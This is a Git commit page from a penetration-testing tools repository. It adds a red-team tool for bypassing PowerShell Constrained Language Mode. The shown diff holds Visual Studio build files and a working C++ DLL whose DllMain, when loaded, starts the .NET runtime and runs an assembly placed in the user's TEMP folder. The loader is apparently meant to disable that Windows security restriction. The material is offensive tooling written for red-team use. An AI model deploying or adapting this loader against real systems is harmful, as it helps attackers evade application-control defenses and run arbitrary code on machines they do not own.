Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-02 18:18:34 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added Bypass-ConstrainedLanguageMode

Browse Source
This commit is contained in:
mb
2019-06-21 04:52:38 +02:00
parent 4aa113e076
commit 4e17445eaf
14 changed files with 903 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

31
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/ClmDisableDll.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.572
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ClmDisableDll", "ClmDisableDll.vcxproj", "{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Debug|x64.ActiveCfg = Debug|x64
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Debug|x64.Build.0 = Debug|x64
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Debug|x86.ActiveCfg = Debug|Win32
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Debug|x86.Build.0 = Debug|Win32
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Release|x64.ActiveCfg = Release|x64
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Release|x64.Build.0 = Release|x64
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Release|x86.ActiveCfg = Release|Win32
{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1154B3D3-39A5-4687-A246-E70587D3BE81}
EndGlobalSection
EndGlobal

145
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/ClmDisableDll.vcxproj Normal file
View File

@ -0,0 +1,145 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{1FF6D4A0-E8D6-4D9F-AE57-FB0DCAE6F8A6}</ProjectGuid>
<RootNamespace>ClmDisableDll</RootNamespace>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<AdditionalDependencies>mscoree.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<AdditionalDependencies>mscoree.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalOptions> /GL /Os /GF /Gy /GA %(AdditionalOptions)</AdditionalOptions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CallingConvention>StdCall</CallingConvention>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>mscoree.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalOptions>/OPT:REF /OPT:ICF /LTCG %(AdditionalOptions)</AdditionalOptions>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>false</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalOptions> /GL /Os /GF /Gy /GA %(AdditionalOptions)</AdditionalOptions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CallingConvention>StdCall</CallingConvention>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>mscoree.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalOptions>/OPT:REF /OPT:ICF /LTCG %(AdditionalOptions)</AdditionalOptions>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

143
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp Normal file
View File

@ -0,0 +1,143 @@
/**
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
* call .NET APIs from an unmanaged runtime.
*
* Mariusz B., mgeeky, 19'
*
**/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <metahost.h>
#include <stdio.h>
#pragma comment(lib, "mscoree.lib")
//////////////////////////////////////////////////
//
// Specify below .NET assembly, main class to instantiate and parameters to pass there.
namespace CustomAssemblyParameters {
LPCWSTR AssemblyName = L"%TEMP%\\ClmDisableAssembly.dll";
LPCWSTR TypeName = L"ClmDisableAssembly.ClmDisableAssembly";
LPCWSTR MethodName = L"Start";
LPCWSTR Argument = L"(called from native CLR host)";
}
//////////////////////////////////////////////////
#ifdef _DEBUG
# define msg(x) MessageBoxW(nullptr, x, L"LoadCLRFromNativeDLL", 0)
#else
# define msg(x) ((void)0)
#endif
void DoProcessAttach()
{
ICLRMetaHost *metaHost = nullptr;
ICLRRuntimeInfo *runtimeInfo = nullptr;
ICLRRuntimeHost *runtimeHost = nullptr;
IEnumUnknown *runtime = nullptr;
IUnknown *enumRuntime = nullptr;
LPWSTR frameworkName = nullptr;
DWORD bytes = 2048;
DWORD result = 0;
if (CLRCreateInstance(
CLSID_CLRMetaHost,
IID_ICLRMetaHost,
reinterpret_cast<LPVOID*>(&metaHost)
) != S_OK) {
msg(L"FAIL: Could not create MetaHost CLR instance.");
return;
}
if (!metaHost || (metaHost->EnumerateInstalledRuntimes(
&runtime
) != S_OK)) {
msg(L"FAIL: Cannot enumerate installed runtimes.");
return;
}
if (!runtime) {
msg(L"FAIL: Could not find installed runtimes.");
return;
}
frameworkName = reinterpret_cast<LPWSTR>(LocalAlloc(
LPTR,
bytes
));
if (!frameworkName) {
msg(L"FAIL: could not allocate 2048 bytes for framework name buffer.");
return;
}
while (runtime->Next(1, &enumRuntime, 0) == S_OK) {
if (enumRuntime && (enumRuntime->QueryInterface<ICLRRuntimeInfo>(&runtimeInfo) == S_OK)) {
if (runtimeInfo != nullptr) {
runtimeInfo->GetVersionString(frameworkName, &bytes);
}
}
}
if (runtimeInfo == nullptr || (runtimeInfo->GetInterface(
CLSID_CLRRuntimeHost,
IID_ICLRRuntimeHost,
reinterpret_cast<LPVOID*>(&runtimeHost)
) != S_OK)) {
msg(L"FAIL: Could not get CLRRuntimeHost interface's reference.");
return;
}
if (runtimeHost == nullptr) {
msg(L"FAIL: Could not obtain reference to CLRRuntimeHost.");
return;
}
runtimeHost->Start();
WCHAR assemblyPath[1024] = L"";
ExpandEnvironmentStringsW(CustomAssemblyParameters::AssemblyName, assemblyPath, _countof(assemblyPath));
LPCWSTR assemblyPathPtr = assemblyPath;
HRESULT hres = runtimeHost->ExecuteInDefaultAppDomain(
assemblyPathPtr,
CustomAssemblyParameters::TypeName,
CustomAssemblyParameters::MethodName,
CustomAssemblyParameters::Argument,
&result
);
if (hres != S_OK) {
wchar_t msgbuf[1024] = L"";
swprintf_s(msgbuf, L"FAIL: Could not invoke custom .NET assembly, instantiate it's type or invoke a method. HRESULT = 0x%08x . Assembly path: '%s'", hres, assemblyPath);
msg(msgbuf);
}
//runtimeHost->Stop();
//runtimeHost->Release();
runtimeInfo->Release();
metaHost->Release();
}
BOOLEAN WINAPI DllMain(
IN HINSTANCE /*hDllHandle*/,
IN DWORD nReason,
IN LPVOID /*Reserved*/
)
{
switch (nReason)
{
case DLL_PROCESS_ATTACH:
{
DoProcessAttach();
break;
}
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}